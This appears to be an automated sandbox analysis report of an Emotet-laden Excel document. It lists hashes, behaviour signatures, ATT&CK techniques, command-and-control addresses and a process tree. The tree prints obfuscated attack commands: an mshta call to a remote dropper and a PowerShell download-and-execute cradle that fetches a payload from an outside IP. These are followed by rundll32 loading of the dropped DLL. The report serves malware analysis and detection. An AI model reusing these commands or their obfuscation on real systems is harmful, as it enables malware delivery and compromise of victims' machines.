Analysis

  • max time kernel
    123s
  • max time network
    175s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 01:16

General

  • Target

    Form - Jan 28, 2022.xls

  • Size

    47KB

  • MD5

    e35cd89022ef7b43a28d8bc20e3fb972

  • SHA1

    45a4e3c25405ad842147b39b4e3a86bcb0460fb7

  • SHA256

    57449a2fc67cc3dd61c322753f14492ce47a4d9ebda40385905794d2d66ca0dc

  • SHA512

    812788761718bb96ff7b10c7b1cc6ab4000b464137c9d2a609b8a0ad19e491b9a460b960b89853e7f8339d59c5ac7d7060294f7c7fd39da2511438eb6b92e159

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/vvv/ppp/fe.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/vvv/ppp/fe.png

Extracted

Family

emotet

Botnet

Epoch4

C2

51.15.4.22:443

173.214.173.220:8080

212.237.5.209:443

192.254.71.210:443

216.158.226.206:443

162.243.175.63:443

212.24.98.99:8080

58.227.42.236:80

45.118.115.99:8080

104.251.214.46:8080

185.157.82.209:8080

46.55.222.11:443

188.40.137.206:8080

81.0.236.90:443

103.75.201.2:443

129.232.188.93:443

195.154.133.20:443

159.8.59.82:8080

79.172.212.216:8080

138.185.72.26:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Form - Jan 28, 2022.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3512
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3216
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/vvv/ppp/fe.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:3200
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 3200 -s 1660
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3592
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2748
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3024
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:2432
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:4000
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eruuxqnikayaail\nibdzipaqhlgr.pyy",klUxLNJYT
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2024
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Eruuxqnikayaail\nibdzipaqhlgr.pyy",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2336

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    568ddf4d26baa3fadb6f5903e18119cc

    SHA1

    c556ef89517f7b5cc51fa96d042958eb553e6519

    SHA256

    74aa2232dc8b7f2c8adf5dc56ab90d92883bf31939ea183609d99a75038b6254

    SHA512

    98f09c6193970cf67a2f392760471e3009501de94189c908b63ee13941a7497ee622ea5798c4c7efc66ebead9d624a95d8c2a5dab633170ae779c869e4ff5df4

  • \ProgramData\QWER.dll
    MD5

    568ddf4d26baa3fadb6f5903e18119cc

    SHA1

    c556ef89517f7b5cc51fa96d042958eb553e6519

    SHA256

    74aa2232dc8b7f2c8adf5dc56ab90d92883bf31939ea183609d99a75038b6254

    SHA512

    98f09c6193970cf67a2f392760471e3009501de94189c908b63ee13941a7497ee622ea5798c4c7efc66ebead9d624a95d8c2a5dab633170ae779c869e4ff5df4

  • \ProgramData\QWER.dll
    MD5

    568ddf4d26baa3fadb6f5903e18119cc

    SHA1

    c556ef89517f7b5cc51fa96d042958eb553e6519

    SHA256

    74aa2232dc8b7f2c8adf5dc56ab90d92883bf31939ea183609d99a75038b6254

    SHA512

    98f09c6193970cf67a2f392760471e3009501de94189c908b63ee13941a7497ee622ea5798c4c7efc66ebead9d624a95d8c2a5dab633170ae779c869e4ff5df4

  • memory/2336-633-0x0000000004A80000-0x0000000004AA5000-memory.dmp
    Filesize

    148KB

  • memory/2336-630-0x0000000004490000-0x00000000044B5000-memory.dmp
    Filesize

    148KB

  • memory/2432-598-0x0000000004D00000-0x0000000004D25000-memory.dmp
    Filesize

    148KB

  • memory/2748-280-0x00000120C0AE0000-0x00000120C0B02000-memory.dmp
    Filesize

    136KB

  • memory/2748-532-0x00000120C0B30000-0x00000120D8C40000-memory.dmp
    Filesize

    385.1MB

  • memory/2748-327-0x00000120D8DA0000-0x00000120D8DDC000-memory.dmp
    Filesize

    240KB

  • memory/2748-340-0x00000120D9330000-0x00000120D93A6000-memory.dmp
    Filesize

    472KB

  • memory/2748-375-0x00000120C0B30000-0x00000120D8C40000-memory.dmp
    Filesize

    385.1MB

  • memory/2748-469-0x00000120C0B30000-0x00000120D8C40000-memory.dmp
    Filesize

    385.1MB

  • memory/3512-120-0x00007FF7F2D00000-0x00007FF7F2D10000-memory.dmp
    Filesize

    64KB

  • memory/3512-118-0x00007FF7F2D00000-0x00007FF7F2D10000-memory.dmp
    Filesize

    64KB

  • memory/3512-131-0x00007FF7F2D00000-0x00007FF7F2D10000-memory.dmp
    Filesize

    64KB

  • memory/3512-130-0x00007FF7EF4D0000-0x00007FF7EF4E0000-memory.dmp
    Filesize

    64KB

  • memory/3512-121-0x00007FF7F2D00000-0x00007FF7F2D10000-memory.dmp
    Filesize

    64KB

  • memory/3512-132-0x00007FF7EF4D0000-0x00007FF7EF4E0000-memory.dmp
    Filesize

    64KB

  • memory/3512-669-0x00007FF7F2D00000-0x00007FF7F2D10000-memory.dmp
    Filesize

    64KB

  • memory/3512-668-0x00007FF7F2D00000-0x00007FF7F2D10000-memory.dmp
    Filesize

    64KB

  • memory/3512-667-0x00007FF7F2D00000-0x00007FF7F2D10000-memory.dmp
    Filesize

    64KB

  • memory/3512-666-0x00007FF7F2D00000-0x00007FF7F2D10000-memory.dmp
    Filesize

    64KB

  • memory/3512-119-0x00007FF7F2D00000-0x00007FF7F2D10000-memory.dmp
    Filesize

    64KB

  • memory/4000-603-0x00000000032B0000-0x00000000032D5000-memory.dmp
    Filesize

    148KB

  • memory/4000-629-0x00000000056A0000-0x00000000056C5000-memory.dmp
    Filesize

    148KB

  • memory/4000-625-0x0000000005640000-0x0000000005665000-memory.dmp
    Filesize

    148KB

  • memory/4000-614-0x0000000005490000-0x00000000054B5000-memory.dmp
    Filesize

    148KB

  • memory/4000-612-0x0000000005430000-0x0000000005455000-memory.dmp
    Filesize

    148KB

  • memory/4000-610-0x00000000053D0000-0x00000000053F5000-memory.dmp
    Filesize

    148KB

  • memory/4000-607-0x0000000004F20000-0x0000000004F45000-memory.dmp
    Filesize

    148KB

  • memory/4000-605-0x0000000004D50000-0x0000000004D75000-memory.dmp
    Filesize

    148KB